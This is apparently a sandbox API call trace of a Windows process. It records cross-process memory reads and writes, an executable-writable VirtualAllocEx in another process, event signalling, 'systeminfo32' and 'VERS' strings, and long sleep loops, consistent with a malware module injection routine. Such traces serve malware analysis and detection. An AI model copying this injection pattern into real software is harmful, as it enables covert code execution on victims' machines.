	[0153.943] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x248fda8, nSize=0x70, lpNumberOfBytesRead=0x248fd84 | out: lpBuffer=0x248fda8*, lpNumberOfBytesRead=0x248fd84*=0x70) returned 1
	[0153.943] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x248fda8*, nSize=0x70, lpNumberOfBytesWritten=0x248fd84 | out: lpBuffer=0x248fda8*, lpNumberOfBytesWritten=0x248fd84*=0x70) returned 1
	[0153.943] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.949] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x248fda8, nSize=0x70, lpNumberOfBytesRead=0x248fd84 | out: lpBuffer=0x248fda8, lpNumberOfBytesRead=0x248fd84) returned 0
	[0153.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2306460) returned 1
	[0153.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cccc0) returned 1
	[0153.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0153.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ac150) returned 1
	[0153.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x209fc0) returned 1
	[0153.950] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24c708) returned 1
	[0153.950] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24c2f8) returned 1
	[0153.950] Sleep (dwMilliseconds=0xbb8) 
	[0153.958] Sleep (dwMilliseconds=0xbb8) 
	[0153.973] Sleep (dwMilliseconds=0xbb8) 
	[0153.990] Sleep (dwMilliseconds=0xbb8) 
	[0154.004] Sleep (dwMilliseconds=0xbb8) 
	[0154.020] Sleep (dwMilliseconds=0xbb8) 
	[0154.035] Sleep (dwMilliseconds=0xbb8) 
	[0154.051] Sleep (dwMilliseconds=0xbb8) 
	[0154.066] Sleep (dwMilliseconds=0xbb8) 
	[0154.082] Sleep (dwMilliseconds=0xbb8) 
	[0154.098] Sleep (dwMilliseconds=0xbb8) 
	[0154.113] Sleep (dwMilliseconds=0xbb8) 
	[0154.130] Sleep (dwMilliseconds=0xbb8) 
	[0154.144] Sleep (dwMilliseconds=0xbb8) 
	[0154.160] Sleep (dwMilliseconds=0xbb8) 
	[0154.176] Sleep (dwMilliseconds=0xbb8) 
	[0154.191] Sleep (dwMilliseconds=0xbb8) 
	[0154.208] Sleep (dwMilliseconds=0xbb8) 
	[0154.222] Sleep (dwMilliseconds=0xbb8) 
	[0154.239] Sleep (dwMilliseconds=0xbb8) 
	[0154.254] Sleep (dwMilliseconds=0xbb8) 
	[0154.269] Sleep (dwMilliseconds=0xbb8) 
	[0154.285] Sleep (dwMilliseconds=0xbb8) 
	[0154.300] Sleep (dwMilliseconds=0xbb8) 
	[0154.316] Sleep (dwMilliseconds=0xbb8) 
	[0154.331] Sleep (dwMilliseconds=0xbb8) 
	[0154.348] Sleep (dwMilliseconds=0xbb8) 
	[0154.365] Sleep (dwMilliseconds=0xbb8) 
	[0154.378] Sleep (dwMilliseconds=0xbb8) 
	[0154.394] Sleep (dwMilliseconds=0xbb8) 
	[0154.410] Sleep (dwMilliseconds=0xbb8) 
	[0154.425] Sleep (dwMilliseconds=0xbb8) 
	[0154.441] Sleep (dwMilliseconds=0xbb8) 
	[0154.487] Sleep (dwMilliseconds=0xbb8) 
	[0154.487] Sleep (dwMilliseconds=0xbb8) 
	[0154.503] Sleep (dwMilliseconds=0xbb8) 
	[0154.519] Sleep (dwMilliseconds=0xbb8) 
	[0154.535] Sleep (dwMilliseconds=0xbb8) 
	[0154.550] Sleep (dwMilliseconds=0xbb8) 
	[0154.566] Sleep (dwMilliseconds=0xbb8) 
	[0154.587] Sleep (dwMilliseconds=0xbb8) 
	[0154.597] Sleep (dwMilliseconds=0xbb8) 
	[0154.612] Sleep (dwMilliseconds=0xbb8) 
	[0154.628] Sleep (dwMilliseconds=0xbb8) 
	[0154.643] Sleep (dwMilliseconds=0xbb8) 
	[0154.659] Sleep (dwMilliseconds=0xbb8) 
	[0154.675] Sleep (dwMilliseconds=0xbb8) 
	[0154.708] Sleep (dwMilliseconds=0xbb8) 
	[0154.721] Sleep (dwMilliseconds=0xbb8) 
	[0154.737] Sleep (dwMilliseconds=0xbb8) 
	[0154.753] Sleep (dwMilliseconds=0xbb8) 
	[0154.769] Sleep (dwMilliseconds=0xbb8) 
	[0154.784] Sleep (dwMilliseconds=0xbb8) 
	[0154.831] Sleep (dwMilliseconds=0xbb8) 
	[0154.846] Sleep (dwMilliseconds=0xbb8) 
	[0154.862] Sleep (dwMilliseconds=0xbb8) 
	[0154.878] Sleep (dwMilliseconds=0xbb8) 
	[0154.893] Sleep (dwMilliseconds=0xbb8) 
	[0154.908] Sleep (dwMilliseconds=0xbb8) 
	[0154.924] Sleep (dwMilliseconds=0xbb8) 
	[0154.940] Sleep (dwMilliseconds=0xbb8) 
	[0154.956] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310cd0
	[0154.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310cd0) returned 1
	[0154.956] Sleep (dwMilliseconds=0xbb8) 
	[0154.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0154.971] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d48) returned 1
	[0154.971] Sleep (dwMilliseconds=0xbb8) 
	[0154.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0154.998] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d48) returned 1
	[0154.998] Sleep (dwMilliseconds=0xbb8) 
	[0155.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.003] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.003] Sleep (dwMilliseconds=0xbb8) 
	[0155.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.019] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.019] Sleep (dwMilliseconds=0xbb8) 
	[0155.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.035] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.035] Sleep (dwMilliseconds=0xbb8) 
	[0155.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0155.052] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d48) returned 1
	[0155.052] Sleep (dwMilliseconds=0xbb8) 
	[0155.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0155.085] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d48) returned 1
	[0155.085] Sleep (dwMilliseconds=0xbb8) 
	[0155.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.097] Sleep (dwMilliseconds=0xbb8) 
	[0155.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0155.115] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d48) returned 1
	[0155.115] Sleep (dwMilliseconds=0xbb8) 
	[0155.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.130] Sleep (dwMilliseconds=0xbb8) 
	[0155.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.145] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.145] Sleep (dwMilliseconds=0xbb8) 
	[0155.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0155.163] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d48) returned 1
	[0155.163] Sleep (dwMilliseconds=0xbb8) 
	[0155.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.176] WaitForSingleObject (hHandle=0x48c, dwMilliseconds=0x0) returned 0x0
	[0155.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x248fe6c | out: lpSystemTimeAsFileTime=0x248fe6c*(dwLowDateTime=0x46451000, dwHighDateTime=0x1d50a6a)) 
	[0155.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0155.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d70
	[0155.176] lstrcmpiW (lpString1="systeminfo32", lpString2="systeminfo32") returned 0
	[0155.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d70) returned 1
	[0155.176] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x248fd70, nSize=0x70, lpNumberOfBytesRead=0x248fd50 | out: lpBuffer=0x248fd70*, lpNumberOfBytesRead=0x248fd50*=0x70) returned 1
	[0155.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d70
	[0155.176] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x360000
	[0155.176] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x360000, lpBuffer=0x2310d70*, nSize=0x14, lpNumberOfBytesWritten=0x248fd48 | out: lpBuffer=0x2310d70*, lpNumberOfBytesWritten=0x248fd48*=0x14) returned 1
	[0155.176] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x248fd70*, nSize=0x70, lpNumberOfBytesWritten=0x248fd48 | out: lpBuffer=0x248fd70*, lpNumberOfBytesWritten=0x248fd48*=0x70) returned 1
	[0155.177] ResetEvent (hEvent=0x488) returned 1
	[0155.177] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.181] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x248fd70, nSize=0x70, lpNumberOfBytesRead=0x248fd48 | out: lpBuffer=0x248fd70*, lpNumberOfBytesRead=0x248fd48*=0x70) returned 1
	[0155.181] VirtualFreeEx (hProcess=0x494, lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.181] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d70) returned 1
	[0155.181] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x248fda8, nSize=0x70, lpNumberOfBytesRead=0x248fd84 | out: lpBuffer=0x248fda8*, lpNumberOfBytesRead=0x248fd84*=0x70) returned 1
	[0155.181] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x248fda8*, nSize=0x70, lpNumberOfBytesWritten=0x248fd84 | out: lpBuffer=0x248fda8*, lpNumberOfBytesWritten=0x248fd84*=0x70) returned 1
	[0155.181] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x102
	[0185.198] GetExitCodeThread (in: hThread=0x490, lpExitCode=0x248fd90 | out: lpExitCode=0x248fd90) returned 1
	[0185.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310ca8) returned 1
	[0185.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26c8c38) returned 1
	[0185.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307960) returned 1
	[0185.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ac150) returned 1
	[0185.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad210) returned 1
	[0185.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2310d48) returned 1
	[0185.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0185.199] Sleep (dwMilliseconds=0xbb8) 
	[0185.204] Sleep (dwMilliseconds=0xbb8) 
	[0185.219] Sleep (dwMilliseconds=0xbb8) 
	[0185.235] Sleep (dwMilliseconds=0xbb8) 
	[0185.251] Sleep (dwMilliseconds=0xbb8) 
	[0185.268] Sleep (dwMilliseconds=0xbb8) 
	[0185.282] Sleep (dwMilliseconds=0xbb8) 
	[0185.297] Sleep (dwMilliseconds=0xbb8) 
	[0185.313] Sleep (dwMilliseconds=0xbb8) 
	[0185.329] Sleep (dwMilliseconds=0xbb8) 
	[0185.344] Sleep (dwMilliseconds=0xbb8) 
	[0185.361] Sleep (dwMilliseconds=0xbb8) 
	[0185.376] Sleep (dwMilliseconds=0xbb8) 
	[0185.391] Sleep (dwMilliseconds=0xbb8) 
	[0185.407] Sleep (dwMilliseconds=0xbb8) 
	[0185.422] Sleep (dwMilliseconds=0xbb8) 
	[0185.438] Sleep (dwMilliseconds=0xbb8) 
	[0185.455] Sleep (dwMilliseconds=0xbb8) 
	[0185.491] Sleep (dwMilliseconds=0xbb8) 
	[0185.500] Sleep (dwMilliseconds=0xbb8) 
	[0185.516] Sleep (dwMilliseconds=0xbb8) 
	[0185.531] Sleep (dwMilliseconds=0xbb8) 
	[0185.547] Sleep (dwMilliseconds=0xbb8) 
	[0185.563] Sleep (dwMilliseconds=0xbb8) 
	[0185.579] Sleep (dwMilliseconds=0xbb8) 
	[0185.594] Sleep (dwMilliseconds=0xbb8) 
	[0185.609] Sleep (dwMilliseconds=0xbb8) 
	[0185.625] Sleep (dwMilliseconds=0xbb8) 
	[0185.641] Sleep (dwMilliseconds=0xbb8) 
	[0185.656] Sleep (dwMilliseconds=0xbb8) 
	[0185.672] Sleep (dwMilliseconds=0xbb8) 
	[0185.697] Sleep (dwMilliseconds=0xbb8) 
	[0185.703] Sleep (dwMilliseconds=0xbb8) 
	[0185.721] Sleep (dwMilliseconds=0xbb8) 
	[0185.735] Sleep (dwMilliseconds=0xbb8) 
	[0185.750] Sleep (dwMilliseconds=0xbb8) 
	[0185.765] Sleep (dwMilliseconds=0xbb8) 
	[0185.781] Sleep (dwMilliseconds=0xbb8) 
	[0185.797] Sleep (dwMilliseconds=0xbb8) 
	[0185.812] Sleep (dwMilliseconds=0xbb8) 
	[0185.831] Sleep (dwMilliseconds=0xbb8) 
	[0185.843] Sleep (dwMilliseconds=0xbb8) 
	[0185.859] Sleep (dwMilliseconds=0xbb8) 
	[0185.875] Sleep (dwMilliseconds=0xbb8) 
	[0185.901] Sleep (dwMilliseconds=0xbb8) 
	[0185.906] Sleep (dwMilliseconds=0xbb8) 
	[0185.921] Sleep (dwMilliseconds=0xbb8) 
	[0185.941] Sleep (dwMilliseconds=0xbb8) 
	[0185.953] Sleep (dwMilliseconds=0xbb8) 
	[0185.968] Sleep (dwMilliseconds=0xbb8) 
	[0185.984] Sleep (dwMilliseconds=0xbb8) 
	[0185.999] Sleep (dwMilliseconds=0xbb8) 
	[0186.015] Sleep (dwMilliseconds=0xbb8) 
	[0186.031] Sleep (dwMilliseconds=0xbb8) 
	[0186.046] Sleep (dwMilliseconds=0xbb8) 
	[0186.062] Sleep (dwMilliseconds=0xbb8) 
	[0186.077] Sleep (dwMilliseconds=0xbb8) 
	[0186.093] Sleep (dwMilliseconds=0xbb8) 
	[0186.109] Sleep (dwMilliseconds=0xbb8) 
	[0186.125] Sleep (dwMilliseconds=0xbb8) 
	[0186.140] Sleep (dwMilliseconds=0xbb8) 
	[0186.156] Sleep (dwMilliseconds=0xbb8) 
	[0186.171] Sleep (dwMilliseconds=0xbb8) 
	[0186.188] Sleep (dwMilliseconds=0xbb8) 
	[0186.202] Sleep (dwMilliseconds=0xbb8) 
	[0186.240] Sleep (dwMilliseconds=0xbb8) 
	[0186.249] Sleep (dwMilliseconds=0xbb8) 
	[0186.265] Sleep (dwMilliseconds=0xbb8) 
	[0186.280] Sleep (dwMilliseconds=0xbb8) 
	[0186.296] Sleep (dwMilliseconds=0xbb8) 
	[0186.311] Sleep (dwMilliseconds=0xbb8) 
	[0186.327] Sleep (dwMilliseconds=0xbb8) 
	[0186.343] Sleep (dwMilliseconds=0xbb8) 
	[0186.358] Sleep (dwMilliseconds=0xbb8) 
	[0186.375] Sleep (dwMilliseconds=0xbb8) 
	[0186.390] Sleep (dwMilliseconds=0xbb8) 
	[0186.407] Sleep (dwMilliseconds=0xbb8) 
	[0186.421] Sleep (dwMilliseconds=0xbb8) 
	[0186.436] Sleep (dwMilliseconds=0xbb8) 
	[0186.452] Sleep (dwMilliseconds=0xbb8) 
	[0186.468] Sleep (dwMilliseconds=0xbb8) 
	[0186.484] Sleep (dwMilliseconds=0xbb8) 
	[0186.499] Sleep (dwMilliseconds=0xbb8) 
	[0186.514] Sleep (dwMilliseconds=0xbb8) 
	[0186.530] Sleep (dwMilliseconds=0xbb8) 
	[0186.545] Sleep (dwMilliseconds=0xbb8) 
	[0186.562] Sleep (dwMilliseconds=0xbb8) 
	[0186.578] Sleep (dwMilliseconds=0xbb8) 
	[0186.592] Sleep (dwMilliseconds=0xbb8) 
	[0186.608] Sleep (dwMilliseconds=0xbb8) 
	[0186.624] Sleep (dwMilliseconds=0xbb8) 
	[0186.639] Sleep (dwMilliseconds=0xbb8) 
	[0186.655] Sleep (dwMilliseconds=0xbb8) 
	[0186.671] Sleep (dwMilliseconds=0xbb8) 
	[0186.686] Sleep (dwMilliseconds=0xbb8) 
	[0186.714] Sleep (dwMilliseconds=0xbb8) 
	[0186.717] Sleep (dwMilliseconds=0xbb8) 
	[0186.733] Sleep (dwMilliseconds=0xbb8) 
	[0186.748] Sleep (dwMilliseconds=0xbb8) 
	[0186.764] Sleep (dwMilliseconds=0xbb8) 
	[0186.786] Sleep (dwMilliseconds=0xbb8) 
	[0186.795] Sleep (dwMilliseconds=0xbb8) 
	[0186.811] Sleep (dwMilliseconds=0xbb8) 
	[0186.826] Sleep (dwMilliseconds=0xbb8) 
	[0186.842] Sleep (dwMilliseconds=0xbb8) 
	[0186.858] Sleep (dwMilliseconds=0xbb8) 
	[0186.873] Sleep (dwMilliseconds=0xbb8) 
	[0186.889] Sleep (dwMilliseconds=0xbb8) 
	[0186.904] Sleep (dwMilliseconds=0xbb8) 
	[0186.920] Sleep (dwMilliseconds=0xbb8) 
	[0186.935] Sleep (dwMilliseconds=0xbb8) 
	[0186.951] Sleep (dwMilliseconds=0xbb8) 
	[0186.967] Sleep (dwMilliseconds=0xbb8) 
	[0186.983] Sleep (dwMilliseconds=0xbb8) 
	[0186.999] Sleep (dwMilliseconds=0xbb8) 
	[0187.014] Sleep (dwMilliseconds=0xbb8) 
	[0187.029] Sleep (dwMilliseconds=0xbb8) 
	[0187.047] Sleep (dwMilliseconds=0xbb8) 
	[0187.060] Sleep (dwMilliseconds=0xbb8) 
	[0187.086] Sleep (dwMilliseconds=0xbb8) 
	[0187.092] Sleep (dwMilliseconds=0xbb8) 
	[0187.108] Sleep (dwMilliseconds=0xbb8) 
	[0187.123] Sleep (dwMilliseconds=0xbb8) 
	[0187.138] Sleep (dwMilliseconds=0xbb8) 
	[0187.162] Sleep (dwMilliseconds=0xbb8) 
	[0187.171] Sleep (dwMilliseconds=0xbb8) 
	[0187.186] Sleep (dwMilliseconds=0xbb8) 
	[0187.201] Sleep (dwMilliseconds=0xbb8) 
	[0187.217] Sleep (dwMilliseconds=0xbb8) 
	[0187.247] Sleep (dwMilliseconds=0xbb8) 
	[0187.247] Sleep (dwMilliseconds=0xbb8) 
	[0187.263] Sleep (dwMilliseconds=0xbb8) 
	[0187.310] Sleep (dwMilliseconds=0xbb8) 
	[0187.347] Sleep (dwMilliseconds=0xbb8) 
	[0187.380] Sleep (dwMilliseconds=0xbb8) 
	[0187.419] Sleep (dwMilliseconds=0xbb8) 
	[0187.466] Sleep (dwMilliseconds=0xbb8) 
	[0187.513] Sleep (dwMilliseconds=0xbb8) 
	[0187.560] Sleep (dwMilliseconds=0xbb8) 
	[0187.598] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263438
	[0187.598] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263438) returned 1
	[0187.598] Sleep (dwMilliseconds=0xbb8) 
	[0187.649] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263438
	[0187.649] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263438) returned 1
	[0187.650] Sleep (dwMilliseconds=0xbb8) 
	[0187.684] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.684] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.684] Sleep (dwMilliseconds=0xbb8) 
	[0187.725] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.725] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.725] Sleep (dwMilliseconds=0xbb8) 
	[0187.760] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.760] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.760] Sleep (dwMilliseconds=0xbb8) 
	[0187.794] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.794] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.794] Sleep (dwMilliseconds=0xbb8) 
	[0187.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.830] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.830] Sleep (dwMilliseconds=0xbb8) 
	[0187.865] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.865] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.865] Sleep (dwMilliseconds=0xbb8) 
	[0187.900] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.900] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.900] Sleep (dwMilliseconds=0xbb8) 
	[0187.949] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263438
	[0187.949] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263438) returned 1
	[0187.950] Sleep (dwMilliseconds=0xbb8) 
	[0187.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0187.988] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0187.988] Sleep (dwMilliseconds=0xbb8) 
	[0188.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.016] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.016] Sleep (dwMilliseconds=0xbb8) 
	[0188.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.052] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.052] Sleep (dwMilliseconds=0xbb8) 
	[0188.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.102] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.102] Sleep (dwMilliseconds=0xbb8) 
	[0188.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.139] Sleep (dwMilliseconds=0xbb8) 
	[0188.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.174] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.174] Sleep (dwMilliseconds=0xbb8) 
	[0188.219] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.219] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.219] Sleep (dwMilliseconds=0xbb8) 
	[0188.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.255] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.255] Sleep (dwMilliseconds=0xbb8) 
	[0188.324] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.324] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.324] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.324] Sleep (dwMilliseconds=0xbb8) 
	[0188.344] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.344] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.344] Sleep (dwMilliseconds=0xbb8) 
	[0188.371] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.371] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.371] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.371] Sleep (dwMilliseconds=0xbb8) 
	[0188.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.417] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0188.417] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.417] Sleep (dwMilliseconds=0xbb8) 
	[0188.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.454] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0188.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225390
	[0188.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ca898
	[0188.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2256c0
	[0188.454] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0188.455] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xedf811, lpBuffer=0x225390, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225390*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0188.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225390, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0188.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225390, cbMultiByte=-1, lpWideCharStr=0x22ad108, cchWideChar=5 | out: lpWideCharStr="VERS") returned 5
	[0188.455] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xedf844, lpBuffer=0x22ca898, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ca898*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
